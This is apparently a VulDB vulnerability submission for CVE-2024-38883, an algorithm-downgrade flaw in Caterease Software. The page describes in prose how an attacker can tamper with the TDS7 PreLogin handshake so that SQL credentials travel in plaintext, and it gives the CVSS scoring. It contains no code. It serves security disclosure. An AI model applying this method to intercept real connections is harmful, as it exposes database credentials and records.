提交 #383223: Horizon Business Services Inc. Caterease Software 16.0.1.1663 through 24.0.1.2405 CWE-757: Selection of Less-Secure Algorithm During Negotiation (信息

标题Horizon Business Services Inc. Caterease Software 16.0.1.1663 through 24.0.1.2405 CWE-757: Selection of Less-Secure Algorithm During Negotiation (
描述NOTE - This submit shall be embargoed until 14:00 CET on 2024-08-01 - NOTE CVE-2024-38883: An issue in Horizon Business Services Inc. Caterease Software allows a remote attacker to perform a Drop Encryption Level attack due to the selection of a less-secure algorithm during negotiation. Vulnerability Type: CWE-757: Selection of Less-Secure Algorithm During Negotiation ('Algorithm Downgrade') Vendor of the Product: Horizon Business Services Inc. Affected Product: Caterease Software Affected Versions: 16.0.1.1663 through 24.0.1.2405 Attack Vector: Remote Attack Type: CAPEC-620: Drop Encryption Level Vulnerability Summary: Caterease Software does not enforce encryption during the TDS7 PreLogin authentication sequence, making it susceptible to a downgrade attack. Attackers can intercept the initial handshake between the Caterease Software client and the SQL server and manipulate the server's response to indicate that encryption is not supported. As a result, the client will proceed to send sensitive information, including database credentials, in plaintext over the network. By exploiting this vulnerability, attackers can capture the unencrypted credentials and use them to gain unauthorized access to the SQL database. This exposure not only compromises the confidentiality of the credentials but also allows attackers to read, modify, or delete database records, leading to significant data breaches and integrity issues. CVSS Base Score: Critical Risk - 9.3 CVSS v3.1 Vector: AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N Exploitability Metrics Attack Vector (AV): Adjacent Network Attack Complexity (AC): Low Privileges Required (PR): None User Interaction (UI): None Scope (S): Changed Impact Metrics Confidentiality (C): High Integrity (I): High Availability (A): None
用户
 jTag Labs (UID 51246)
提交2024-07-30 16時53分 (2 年前)
管理2024-08-01 14時14分 (2 days later)
状态已接受
VulDB条目273367 [Horizon Business Services Caterease 直到 24.0.1.2405 TDS7 PreLogin Authentication 弱加密]
积分17

Are you interested in using VulDB?

Download the whitepaper to learn more about our service!